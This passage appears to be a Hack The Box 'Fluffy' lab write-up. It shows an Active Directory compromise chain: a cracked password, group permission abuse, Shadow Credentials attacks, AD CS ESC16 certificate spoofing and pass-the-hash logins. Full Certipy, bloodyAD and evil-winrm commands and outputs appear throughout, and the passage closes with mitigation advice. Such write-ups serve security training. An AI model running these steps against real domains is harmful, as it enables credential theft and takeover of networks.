Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
prometheusx-303 (p.agila)
1g 0:00:00:02 DONE (2025-05-25 07:53) 0.4926g/s 2225Kp/s 2225Kc/s 2225KC/s proquis..programmercomputer
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
- Cracked Credential:
p.agila:prometheusx-303
Lateral Movement & User Compromise
Group Permission Analysis
Our enumeration of Active Directory permissions reveals:
- The user account
p.agilais a member of the SERVICE ACCOUNT MANAGER security group. - The SERVICE ACCOUNT MANAGER group holds GenericAll rights over the SERVICE ACCOUNTS group.
- The SERVICE ACCOUNTS group is configured with GenericWrite privileges over several critical service accounts, including
ca_svc,winrm_svc, andldap_svc.
Exploiting Group Membership Delegation
Since p.agila has GenericAll over the SERVICE ACCOUNTS group, we use bloodyAD to add p.agila as a member of the SERVICE ACCOUNTS group. This grants p.agila direct delegation control over the service accounts.
1
2
3
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ bloodyAD --host 10.10.11.69 -d fluffy.htb -u p.agila -p 'prometheusx-303' add groupMember 'Service Accounts' p.agila
[+] p.agila added to Service Accounts
Shadow Credentials Attack (winrm_svc)
Initially, we try targeted Kerberoasting against the service accounts to extract TGS hashes:
1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ python3 targetedKerberoast.py -v -d 'fluffy.htb' -u 'p.agila' -p 'prometheusx-303'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ca_svc)
$krb5tgs$23$*ca_svc$FLUFFY.HTB$fluffy.htb/ca_svc*$9af66f97250096b8559310e135d7f7a2$5484c416759e38f3f199d20eb5e85c9fe3d49f7b7042ad3377a5bbbd56ff6189b26ae79394122bddac55503508cb778ebd21d4bcbcb0c72ecad4ebc6967bf0de058bd3a24ae7706a646549613c85018d5a4ebbee5e28f625cdd71f50fe23301cb2c0ffb61f647a2d373cc7aeef1d45c4af9299e85642ce58c6dcada73289290fb659f51875010bf45901e56c339ac3c06628ea833f659daaddae662cedc3b7ff6a8dce0aeb90cb227fbe49f1b7e7f23495bdd2372ef00703b2d1eabff9fba310e0734b3131690be71a06390b0ee79de16b6d62643c4a5bb2a94496a32e5f809008ea788a92c4eafecd9703c4920a36e29f4cb33df757a2d86c701a94566c4619cc23fbbccf7914c33e3377e40b1c80872ffcf983c6925b0c699701c747c9b03d2f58c64574f1f9d3575bf934c48b00f464076bc75026d8da5207c6fffae5dfb311336cd9a256610244d62cc40f40e2a7e4
.
.
.
The hashes extracted are complex and cannot be cracked using offline wordlists. As an alternative, since the Service Accounts group has GenericWrite permissions over the target accounts, we execute a Shadow Credentials attack. A Shadow Credentials attack exploits write access on an object’s msDS-KeyCredentialLink attribute. We populate the attribute with a key credential mapping containing a custom certificate public key. We then use the certificate to request a Kerberos TGT via PKINIT and retrieve the account’s NT hash.
We target the winrm_svc user account using Certipy:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ certipy-ad shadow auto -username P.AGILA@fluffy.htb -password 'prometheusx-303' -account WINRM_SVC
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'c08bbd98-3dd7-8f4a-e78c-91119cf8855f'
[*] Adding Key Credential with device ID 'c08bbd98-3dd7-8f4a-e78c-91119cf8855f' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID 'c08bbd98-3dd7-8f4a-e78c-91119cf8855f' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767
Using the retrieved NT hash for winrm_svc, we login using evil-winrm and read the user flag:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ evil-winrm -i $IP -u winrm_svc -H '33bd09dcd697600edf6b3a7af4875767'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> type ..\Desktop\user.txt
**********ba5b84feed2107fa7af
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> exit
Privilege Escalation: AD CS ESC16 Abuse
Vulnerability Explanation
The Privilege Escalation ADCS ESC 16 misconfiguration arises when Active Directory Certificate Services (AD CS) CA configurations run without the security extensions enabled (such as 1.3.6.1.4.1.311.25.2 for enforcing strong security SID mapping in certificate attributes). This allows an attacker to request certificates on behalf of other users using standard templates (like User) where the authentication context maps identity purely based on the User Principal Name (UPN) SAN attribute. If an attacker has write permissions over a target account’s UPN, they can modify it to match a target administrator UPN, request the certificate, retrieve the certificate mapped to the administrator, and then revert the UPN modification to hijack the target identity.
Exploitation Step 1: Compromising the ca_svc Account
We execute another Shadow Credentials attack, this time targeting the ca_svc account:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ certipy-ad shadow auto -username P.AGILA@fluffy.htb -password 'prometheusx-303' -account CA_SVC
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '24dac53a-f906-d5fa-9a02-f58b3b15029c'
[*] Adding Key Credential with device ID '24dac53a-f906-d5fa-9a02-f58b3b15029c' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '24dac53a-f906-d5fa-9a02-f58b3b15029c' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
Exploitation Step 2: AD CS Enumeration
Using the ca_svc credentials, we run Certipy to enumerate vulnerable templates and discover the CA configuration:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
┌──(certipy-venv)─(kali㉿kali)-[~/HTB-machine/fluffy/Certipy-5.0.2]
└─$ certipy find -vulnerable -u ca_svc@fluffy.htb -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -stdout
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: FLUFFY.HTB.
[!] Use -debug to print a stacktrace
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[!] DNS resolution failed: The DNS query name does not exist: DC01.fluffy.htb.
[!] Use -debug to print a stacktrace
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5
Certificate Validity Start : 2025-04-17 16:00:16+00:00
Certificate Validity End : 3024-04-17 16:11:16+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Disabled Extensions : 1.3.6.1.4.1.311.25.2
Permissions
Owner : FLUFFY.HTB\Administrators
Access Rights
ManageCa : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
ManageCertificates : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
Enroll : FLUFFY.HTB\Cert Publishers
[!] Vulnerabilities
ESC16 : Security Extension is disabled.
[*] Remarks
ESC16 : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates : [!] Could not find any certificate templates
The output confirms the ESC16 misconfiguration exists because the security SID mapping extension (1.3.6.1.4.1.311.25.2) is disabled on the fluffy-DC01-CA authority.
Exploitation Step 3: Certificate Spoofing
Using p.agila’s permissions, we update the UPN mapping of the ca_svc account to administrator:
1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~/HTB-machine/fluffy/Certipy-5.0.2]
└─$ certipy account -u 'p.agila@fluffy.htb' -p'prometheusx-303' -target 'dc01.fluffy.htb' -upn 'administrator' -user 'ca_svc' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: dc01.fluffy.htb.
[!] Use -debug to print a stacktrace
[*] Updating user 'ca_svc':
userPrincipalName : administrator
[*] Successfully updated 'ca_svc'
Next, we request a certificate using ca_svc credentials against the standard User certificate template. Because the CA evaluates UPN mappings dynamically and does not validate SIDs (due to ESC16), it generates a certificate containing administrator as the identity.
1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/HTB-machine/fluffy/Certipy-5.0.2]
└─$ certipy req -dc-ip '10.10.11.69' -u 'ca_svc@fluffy.htb' -hashes :ca0f4f9e9eb8a092addf53bb03fc98c8 -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 18
] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
We immediately restore the UPN of the ca_svc account to avoid service disruption:
1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~/HTB-machine/fluffy/Certipy-5.0.2]
└─$ certipy account -u 'p.agila@fluffy.htb' -p'prometheusx-303' -target 'dc01.fluffy.htb' -upn 'ca_svc' -user 'ca_svc' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: dc01.fluffy.htb.
[!] Use -debug to print a stacktrace
[*] Updating user 'ca_svc':
userPrincipalName : ca_svc
[*] Successfully updated 'ca_svc'
Exploitation Step 4: Administrator Authentication
Using the forged administrator.pfx certificate, we perform PKINIT authentication against the Domain Controller to request a TGT and retrieve the NTLM hash of the built-in Administrator account.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿kali)-[~/HTB-machine/fluffy/Certipy-5.0.2]
└─$ certipy auth -pfx administrator.pfx -domain fluffy.htb -dc-ip 10.10.11.69
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
We authenticate as the Administrator using evil-winrm and the NTLM hash to retrieve the root flag:
1
2
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ evil-winrm -i $IP -u administrator -H '8da83a3fa618b6e3a00e93f676c92a6e'
Mitigations & Security Recommendations
1. Hardening AD CS Settings (Remediate ESC16)
- Enable Strong SID Bindings: Enforce SID authentication mapping on the Active Directory Certificate Authority (CA) by enabling the SID mapping extension (
1.3.6.1.4.1.311.25.2). Update the registry values on the CA server to require strong bindings for Kerberos authentication. - Limit UPN Write Permissions: Enforce strict access control limits on user accounts so low-privilege accounts or group members cannot update UPN attributes (
userPrincipalName) on service accounts or other users.
2. Safeguard against Client-Side Spoofing (CVE-2025-24071)
- Registry and File-Handling Policies: Disable or restrict the execution and parsing of Library Description files (
.library-ms) across corporate systems where possible, or monitor their usage. - SMB Outbound Traffic Filtering: Filter and block outbound SMB connections (ports 139 and 445) from workstation networks to external IP addresses to prevent NTLM hash leakage to external listeners.
3. Restrict Directory Permissions and Shadow Credentials Attack Vector
- Audit Write Attributes: Limit write access (specifically
GenericWriteandWritePropertyformsDS-KeyCredentialLink) on user and computer accounts to prevent unauthorized addition of key credentials. - Implement Tiered Administration: Do not place administrative users or managers in security groups that delegate control over service accounts (
ca_svc,winrm_svc). Keep management accounts distinct and tier-restricted.
4. Enable Logging and Intrusive Alerts
- PKINIT Monitoring: Monitor Windows Directory Service events for certificate-based authentication requests containing no SID mappings.
- UPN Modification Tracking: Establish audit policies (Event ID 4738: “A user account was changed”) to monitor changes to the
userPrincipalNameattribute on all domain accounts, specifically targeting service accounts.




